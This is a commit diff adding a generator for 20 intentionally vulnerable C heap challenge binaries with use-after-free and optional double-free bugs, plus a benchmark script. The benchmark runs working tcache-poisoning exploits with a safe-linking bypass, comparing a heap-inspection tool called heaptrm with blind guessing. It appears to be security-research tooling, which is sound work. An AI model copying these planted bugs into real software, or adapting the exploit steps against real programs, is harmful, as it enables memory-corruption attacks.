20-challenge suite benchmark: heaptrm 65% vs blind 25% overall

Easy: 100% vs 75% (+25 points), Medium: 83% vs 33% (+50 points), Hard: 67% vs 0% (+67 points).
heaptrm provides a decisive advantage when the binary lacks address leaks.
The suite has 20 binaries that vary in UAF read, address leak, heap noise, and slot count.

Files changed (2) hide show

cve_tests/gen_challenge_suite.py +241 -0
cve_tests/run_suite_benchmark.py +295 -0

cve_tests/gen_challenge_suite.py ADDED Viewed

	@@ -0,0 +1,241 @@

+#!/usr/bin/env python3
+"""
+gen_challenge_suite.py — Generate 20 heap challenge binaries with varying difficulty.
+Dimensions of variation:
+  - UAF read:     yes / no
+  - Address leak:  prints addrs / prints nothing / prints partial
+  - Heap noise:   none / light (2-3) / heavy (5-10)
+  - Size classes: 1 / 3 / 5
+  - Slot count:   4 / 8 / 16
+  - Edit size:    8 bytes / full chunk
+  - Double-free protection: yes / no
+"""
+import os
+import subprocess
+import random
+import json
+from pathlib import Path
+# Repository root: two directory levels above this script.
+ROOT = Path(__file__).parent.parent
+# Directory that receives the generated .c sources, binaries and JSON configs.
+OUT = ROOT / "cve_tests" / "suite"
+# Created as an import-time side effect; exist_ok makes repeated runs a no-op.
+OUT.mkdir(exist_ok=True)
+# C source template for one challenge binary, filled in with str.format() by
+# gen_challenge(). Single-brace names ({max_slots}, {alloc_print}, ...) are
+# substitution fields; doubled braces are literal C braces.
+# The generated program reads a numeric menu from stdin:
+#   1 <slot> <size_class>   allocate a zeroed chunk (size_class is 1-based)
+#   2 <slot> <hex>          write up to EDIT_MAX decoded bytes into the chunk
+#   3 <slot>                hex-dump up to 32 bytes of the chunk
+#   4 <slot>                free the chunk
+#   5                       exit
+# free() clears only the `active` flag, never the `data` pointer, so stale
+# pointers stay reachable; the injected {show_check} / {double_free_check}
+# snippets decide whether reading or re-freeing them is rejected.
+TEMPLATE = r"""
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <time.h>
+#define MAX_SLOTS {max_slots}
+#define EDIT_MAX {edit_max}
+static int sizes[] = {{{sizes_str}}};
+static int n_sizes = {n_sizes};
+struct slot {{
+    char *data;
+    int size_idx;
+    int active;
+}};
+static struct slot slots[MAX_SLOTS];
+static void heap_noise(void) {{
+    srand(time(NULL) ^ getpid());
+    int n = {noise_min} + (rand() % {noise_range});
+    for (int i = 0; i < n; i++) {{
+        int sz = sizes[rand() % n_sizes];
+        char *p = malloc(sz);
+        memset(p, 'N', sz);
+        if (rand() % {noise_free_mod} == 0) free(p);
+    }}
+}}
+int main(void) {{
+    setbuf(stdin, NULL);
+    setbuf(stdout, NULL);
+    heap_noise();
+    int choice, slot, sc;
+    char hexbuf[520];
+    while (scanf("%d", &choice) == 1) {{
+        switch (choice) {{
+        case 1:
+            if (scanf("%d %d", &slot, &sc) != 2) break;
+            if (slot < 0 || slot >= MAX_SLOTS || sc < 1 || sc > n_sizes) {{ puts("ERR"); break; }}
+            if (slots[slot].data != NULL) {{ puts("ERR"); break; }}
+            slots[slot].data = malloc(sizes[sc-1]);
+            if (!slots[slot].data) {{ puts("ERR"); break; }}
+            memset(slots[slot].data, 0, sizes[sc-1]);
+            slots[slot].size_idx = sc-1;
+            slots[slot].active = 1;
+            {alloc_print}
+            break;
+        case 2:
+            if (scanf("%d %512s", &slot, hexbuf) != 2) break;
+            if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
+            {{
+                unsigned char bytes[256] = {{0}};
+                int len = strlen(hexbuf) / 2;
+                if (len > EDIT_MAX) len = EDIT_MAX;
+                for (int i = 0; i < len; i++) {{
+                    unsigned int b;
+                    sscanf(hexbuf + i*2, "%2x", &b);
+                    bytes[i] = (unsigned char)b;
+                }}
+                memcpy(slots[slot].data, bytes, len);
+            }}
+            puts("OK");
+            break;
+        case 3:
+            if (scanf("%d", &slot) != 1) break;
+            if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
+            {show_check}
+            {{
+                unsigned char *p = (unsigned char *)slots[slot].data;
+                int n = sizes[slots[slot].size_idx];
+                if (n > 32) n = 32;
+                for (int i = 0; i < n; i++) printf("%02x", p[i]);
+                puts("");
+            }}
+            break;
+        case 4:
+            if (scanf("%d", &slot) != 1) break;
+            if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
+            {double_free_check}
+            free(slots[slot].data);
+            slots[slot].active = 0;
+            {free_print}
+            break;
+        case 5:
+            goto done;
+        default:
+            puts("ERR");
+            break;
+        }}
+    }}
+done:
+    return 0;
+}}
+"""
+def gen_challenge(idx, config):
+    """Generate and compile one challenge binary."""
+    sizes = config["sizes"]
+    sizes_str = ", ".join(str(s) for s in sizes)
+    # UAF read protection
+    if config["uaf_read"]:
+        show_check = "/* UAF read allowed */"
+    else:
+        show_check = 'if (!slots[slot].active) { puts("DELETED"); break; }'
+    # Address leak on alloc
+    if config["addr_leak"] == "full":
+        alloc_print = 'printf("OK 0x%lx\\n", (unsigned long)slots[slot].data);'
+    elif config["addr_leak"] == "partial":
+        alloc_print = 'printf("OK %x\\n", (unsigned int)((unsigned long)slots[slot].data & 0xffff));'
+    else:
+        alloc_print = 'puts("OK");'
+    # Address leak on free
+    if config["addr_leak"] == "full":
+        free_print = 'printf("OK 0x%lx\\n", (unsigned long)slots[slot].data);'
+    else:
+        free_print = 'puts("OK");'
+    # Double-free protection
+    if config["double_free_prot"]:
+        double_free_check = 'if (!slots[slot].active) { puts("ERR"); break; }'
+    else:
+        double_free_check = "/* no double-free check */"
+    source = TEMPLATE.format(
+        max_slots=config["max_slots"],
+        edit_max=config["edit_max"],
+        sizes_str=sizes_str,
+        n_sizes=len(sizes),
+        noise_min=config["noise_min"],
+        noise_range=max(1, config["noise_max"] - config["noise_min"]),
+        noise_free_mod=config.get("noise_free_mod", 3),
+        alloc_print=alloc_print,
+        show_check=show_check,
+        free_print=free_print,
+        double_free_check=double_free_check,
+    )
+    name = f"chal_{idx:02d}"
+    src_path = OUT / f"{name}.c"
+    bin_path = OUT / name
+    src_path.write_text(source)
+    r = subprocess.run(
+        ["gcc", "-o", str(bin_path), str(src_path), "-std=c99", "-g", "-O0", "-Wno-all"],
+        capture_output=True, text=True,
+    )
+    if r.returncode != 0:
+        return None
+    # Save config
+    config["name"] = name
+    config["idx"] = idx
+    (OUT / f"{name}.json").write_text(json.dumps(config, indent=2))
+    return name
+def main():
+    """Generate every challenge in the built-in config table and write the manifest.
+    Each config is passed to gen_challenge(); configs that compile are printed
+    as a one-line summary and collected, failures are reported and skipped.
+    The collected configs are written to OUT/manifest.json.
+    """
+    random.seed(42)
+    challenges = []
+    # Generate 20 challenges with varying difficulty
+    configs = [
+        # Easy: UAF read, full leak, no noise
+        {"uaf_read": True, "addr_leak": "full", "noise_min": 0, "noise_max": 0, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "easy"},
+        {"uaf_read": True, "addr_leak": "full", "noise_min": 0, "noise_max": 0, "sizes": [0x20, 0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "easy"},
+        {"uaf_read": True, "addr_leak": "full", "noise_min": 0, "noise_max": 0, "sizes": [0x40], "max_slots": 16, "edit_max": 8, "double_free_prot": False, "difficulty": "easy"},
+        {"uaf_read": True, "addr_leak": "none", "noise_min": 0, "noise_max": 0, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "easy"},
+        # Medium: partial info, some noise
+        {"uaf_read": True, "addr_leak": "none", "noise_min": 2, "noise_max": 4, "sizes": [0x20, 0x40, 0x80], "max_slots": 8, "edit_max": 8, "double_free_prot": False, "difficulty": "medium"},
+        {"uaf_read": True, "addr_leak": "partial", "noise_min": 1, "noise_max": 3, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": True, "difficulty": "medium"},
+        {"uaf_read": False, "addr_leak": "full", "noise_min": 0, "noise_max": 2, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "medium"},
+        {"uaf_read": False, "addr_leak": "full", "noise_min": 2, "noise_max": 4, "sizes": [0x20, 0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": False, "difficulty": "medium"},
+        {"uaf_read": True, "addr_leak": "none", "noise_min": 3, "noise_max": 5, "sizes": [0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "medium"},
+        {"uaf_read": False, "addr_leak": "partial", "noise_min": 2, "noise_max": 5, "sizes": [0x20, 0x40, 0x80], "max_slots": 8, "edit_max": 16, "double_free_prot": False, "difficulty": "medium"},
+        # Hard: no UAF read, no leak, noise
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 3, "noise_max": 6, "sizes": [0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": False, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 3, "noise_max": 7, "sizes": [0x20, 0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": True, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 4, "noise_max": 8, "sizes": [0x20, 0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": False, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 5, "noise_max": 10, "sizes": [0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": True, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 3, "noise_max": 6, "sizes": [0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": False, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 5, "noise_max": 8, "sizes": [0x20, 0x40, 0x80], "max_slots": 8, "edit_max": 8, "double_free_prot": True, "difficulty": "hard"},
+        # Extreme: all mitigations, heavy noise, restricted
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 8, "noise_max": 12, "sizes": [0x40], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "extreme"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 6, "noise_max": 10, "sizes": [0x20, 0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "extreme"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 10, "noise_max": 15, "sizes": [0x40], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "noise_free_mod": 5, "difficulty": "extreme"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 8, "noise_max": 12, "sizes": [0x20, 0x40, 0x80, 0x100, 0x200], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "extreme"},
+    ]
+    for i, config in enumerate(configs):
+        # gen_challenge adds "name" and "idx" to config on success.
+        name = gen_challenge(i, config)
+        if name:
+            print(f"  [{config['difficulty']:8s}] {name}: uaf_read={config['uaf_read']} "
+                  f"leak={config['addr_leak']:7s} noise={config['noise_min']}-{config['noise_max']} "
+                  f"sizes={len(config['sizes'])} slots={config['max_slots']} edit={config['edit_max']}")
+            challenges.append(config)
+        else:
+            print(f"  FAILED: challenge {i}")
+    # Save manifest (only the challenges that compiled)
+    (OUT / "manifest.json").write_text(json.dumps(challenges, indent=2))
+    print(f"\nGenerated {len(challenges)} challenges in {OUT}")
+if __name__ == "__main__":
+    main()

cve_tests/run_suite_benchmark.py ADDED Viewed

	@@ -0,0 +1,295 @@

+#!/usr/bin/env python3
+"""
+run_suite_benchmark.py — Benchmark heaptrm vs blind on 20 challenge binaries.
+"""
+import subprocess
+import json
+import struct
+import os
+import time
+from pathlib import Path
+from pwn import process as pwn_process, p64, u64, context
+# Restrict pwntools logging to error-level messages.
+context.log_level = "error"
+# Repository root: two directory levels above this script.
+ROOT = Path(__file__).parent.parent
+# Directory holding the challenge binaries and manifest.json.
+SUITE = ROOT / "cve_tests" / "suite"
+# Path to the heaptrm executable (presumably a cargo release build — confirm).
+HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm")
+# Number of attempts per challenge for each of the two strategies.
+TRIALS = 10
+def exploit_heaptrm(binary, config):
+    """Attempt exploit using heaptrm. Returns (success, turns)."""
+    turns = 0
+    sc = 1  # use first size class
+    for s in config["sizes"]:
+        if s == 0x40:
+            sc = config["sizes"].index(s) + 1
+            break
+    proc = subprocess.Popen(
+        [HEAPTRM, str(binary)],
+        stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True
+    )
+    def cmd(action, data=""):
+        nonlocal turns
+        turns += 1
+        proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
+        proc.stdin.flush()
+        line = proc.stdout.readline()
+        return json.loads(line) if line else {}
+    try:
+        # Alloc 3
+        cmd("send", f"1 0 {sc}\n")
+        cmd("send", f"1 1 {sc}\n")
+        cmd("send", f"1 2 {sc}\n")
+        # Free 0 and 1
+        cmd("send", "4 0\n")
+        cmd("send", "4 1\n")
+        # Observe — get addresses
+        r = cmd("observe")
+        if not r.get("heap"):
+            cmd("quit"); return False, turns
+        chunks = r["heap"]["chunks"]
+        freed = sorted([c for c in chunks if c["state"] == "freed"],
+                       key=lambda c: int(c["address"], 16))
+        allocated = sorted([c for c in chunks if c["state"] == "allocated"],
+                          key=lambda c: int(c["address"], 16))
+        if len(freed) < 1 or not allocated:
+            cmd("quit"); return False, turns
+        # Find my chunks: the ones with highest addresses (after noise)
+        # Chunk 1 = last freed, target = first allocated after freed
+        chunk1_addr = int(freed[-1]["address"], 16)
+        target_addr = int(allocated[-1]["address"], 16)
+        # Safe-linking bypass
+        xor_key = chunk1_addr >> 12
+        poisoned = target_addr ^ xor_key
+        fd_hex = struct.pack("<Q", poisoned).hex()[:16]
+        # UAF write
+        cmd("send", f"2 1 {fd_hex}\n")
+        # Drain tcache
+        cmd("send", f"1 3 {sc}\n")
+        cmd("send", f"1 4 {sc}\n")
+        # Write marker through 4, check via 2
+        cmd("send", f"2 4 50574e454421210a\n")  # "PWNED!!\n"
+        r = cmd("send", "3 2\n")
+        cmd("quit")
+        # Check output for our marker
+        output = r.get("output", "")
+        if "50574e4544" in output:
+            return True, turns
+        return False, turns
+    except:
+        try: proc.kill()
+        except: pass
+        return False, turns
+def exploit_blind(binary, config):
+    """Attempt exploit without heaptrm. Returns (success, turns)."""
+    turns = 0
+    sc = 1
+    for s in config["sizes"]:
+        if s == 0x40:
+            sc = config["sizes"].index(s) + 1
+            break
+    p = pwn_process(str(binary))
+    turns += 1
+    def alloc(slot, size_class):
+        nonlocal turns; turns += 1
+        p.sendline(f"1 {slot} {size_class}".encode())
+        return p.recvline(timeout=0.5).strip()
+    def free_s(slot):
+        nonlocal turns; turns += 1
+        p.sendline(f"4 {slot}".encode())
+        return p.recvline(timeout=0.5).strip()
+    def edit(slot, hexdata):
+        nonlocal turns; turns += 1
+        p.sendline(f"2 {slot} {hexdata}".encode())
+        return p.recvline(timeout=0.5).strip()
+    def show(slot):
+        nonlocal turns; turns += 1
+        p.sendline(f"3 {slot}".encode())
+        return p.recvline(timeout=0.5).strip()
+    try:
+        r0 = alloc(0, sc)
+        r1 = alloc(1, sc)
+        r2 = alloc(2, sc)
+        # Extract addresses if binary leaks them
+        addr0 = addr1 = addr2 = None
+        for r, name in [(r0, "0"), (r1, "1"), (r2, "2")]:
+            if r and b"0x" in r:
+                try:
+                    addr_str = r.split(b"0x")[1].split()[0]
+                    addr = int(addr_str, 16)
+                    if name == "0": addr0 = addr
+                    elif name == "1": addr1 = addr
+                    elif name == "2": addr2 = addr
+                except: pass
+        free_s(0)
+        free_s(1)
+        # Try UAF read
+        leak_data = show(1)
+        leaked_fd = None
+        if leak_data and leak_data != b"DELETED" and leak_data != b"ERR" and len(leak_data) >= 16:
+            try:
+                leaked_fd = int(leak_data[:16], 16)
+            except: pass
+        # Determine what info we have
+        if addr1 and addr2:
+            # Full addr leak — compute directly
+            xor_key = addr1 >> 12
+            poisoned = addr2 ^ xor_key
+        elif leaked_fd and addr1:
+            # Have UAF read + alloc leak
+            xor_key = addr1 >> 12
+            poisoned = addr2 ^ xor_key if addr2 else 0
+        elif leaked_fd:
+            # UAF read only — try to decrypt with guessed key
+            guess_key = 0x555555559
+            decrypted = leaked_fd ^ guess_key
+            if 0x555555550000 < decrypted < 0x555555570000:
+                chunk0 = decrypted
+                chunk1 = chunk0 + 0x50
+                target = chunk1 + 0x50
+                poisoned = target ^ guess_key
+            else:
+                p.close(); return False, turns
+        elif addr0 and addr2:
+            # Alloc leak but no UAF read
+            xor_key = (addr0 + 0x50) >> 12  # guess chunk1 addr
+            poisoned = addr2 ^ xor_key
+        else:
+            # No info at all — must guess
+            guess_base = 0x555555559000
+            # Try a few offsets
+            for offset in [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, 0x600]:
+                chunk1_guess = guess_base + offset + 0x50
+                target_guess = chunk1_guess + 0x50
+                xor_key = chunk1_guess >> 12
+                poisoned = target_guess ^ xor_key
+                edit(1, p64(poisoned).hex()[:16])
+                alloc(3, sc)
+                alloc(4, sc)
+                edit(4, b"PWNED!!".hex())
+                result = show(2)
+                if result and b"50574e4544" in result:
+                    p.close(); return True, turns
+                p.close(); return False, turns
+        # Execute with computed poisoned fd
+        edit(1, p64(poisoned).hex()[:16])
+        alloc(3, sc)
+        alloc(4, sc)
+        edit(4, b"PWNED!!".hex())
+        result = show(2)
+        p.close()
+        return result and b"50574e4544" in result, turns
+    except:
+        try: p.close()
+        except: pass
+        return False, turns
+def main():
+    manifest = json.loads((SUITE / "manifest.json").read_text())
+    print("=" * 80)
+    print(f"SUITE BENCHMARK: heaptrm vs blind | {len(manifest)} challenges | {TRIALS} trials each")
+    print("=" * 80)
+    results = []
+    for config in manifest:
+        name = config["name"]
+        binary = SUITE / name
+        if not binary.exists():
+            continue
+        ht_wins = 0
+        bl_wins = 0
+        ht_turns = 0
+        bl_turns = 0
+        for t in range(TRIALS):
+            s, turns = exploit_heaptrm(binary, config)
+            ht_wins += int(s)
+            ht_turns += turns
+            s, turns = exploit_blind(binary, config)
+            bl_wins += int(s)
+            bl_turns += turns
+        r = {
+            "name": name,
+            "difficulty": config["difficulty"],
+            "uaf_read": config["uaf_read"],
+            "addr_leak": config["addr_leak"],
+            "noise": f"{config['noise_min']}-{config['noise_max']}",
+            "ht_rate": ht_wins / TRIALS,
+            "bl_rate": bl_wins / TRIALS,
+            "ht_turns": ht_turns / TRIALS,
+            "bl_turns": bl_turns / TRIALS,
+        }
+        results.append(r)
+        delta = r["ht_rate"] - r["bl_rate"]
+        marker = ">>>" if delta > 0.5 else "==" if abs(delta) < 0.1 else ">"
+        print(f"  {name} [{config['difficulty']:8s}] heaptrm={ht_wins}/{TRIALS} blind={bl_wins}/{TRIALS} "
+              f"leak={config['addr_leak']:7s} uaf={config['uaf_read']} noise={r['noise']} {marker}")
+    # Summary
+    print("\n" + "=" * 80)
+    print("SUMMARY BY DIFFICULTY")
+    print("=" * 80)
+    for diff in ["easy", "medium", "hard", "extreme"]:
+        group = [r for r in results if r["difficulty"] == diff]
+        if not group:
+            continue
+        ht_avg = sum(r["ht_rate"] for r in group) / len(group)
+        bl_avg = sum(r["bl_rate"] for r in group) / len(group)
+        print(f"  {diff:8s}: heaptrm={ht_avg*100:.0f}% blind={bl_avg*100:.0f}% "
+              f"delta={ht_avg*100-bl_avg*100:+.0f}% ({len(group)} challenges)")
+    # Overall
+    ht_total = sum(r["ht_rate"] for r in results) / len(results)
+    bl_total = sum(r["bl_rate"] for r in results) / len(results)
+    print(f"\n  OVERALL:  heaptrm={ht_total*100:.0f}% blind={bl_total*100:.0f}% "
+          f"delta={ht_total*100-bl_total*100:+.0f}%")
+    # Save
+    (SUITE / "benchmark_results.json").write_text(json.dumps(results, indent=2))
+if __name__ == "__main__":
+    main()